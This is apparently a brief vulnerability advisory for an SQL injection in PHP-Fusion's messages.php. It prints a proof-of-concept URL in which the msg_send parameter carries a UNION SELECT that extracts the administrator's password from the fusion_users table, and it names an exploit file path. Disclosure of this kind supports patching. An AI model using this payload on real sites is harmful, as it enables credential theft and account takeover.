PHP-Fusion Messages.PHP SQL Injection Vulnerability

PHP-Fusion Messages.PHP SQL Injection Vulnerability

No exploit is required.

A proof of concept has been provided:

http://www.example.com/[path_to_Php_Fusion]/messages.php?msg_send=' UNION SELECT user_password FROM fusion_users WHERE user_name='[admin_username]'/*

The following exploit is available:

/data/vulnerabilities/exploits/PhpF6_00_109xpl.php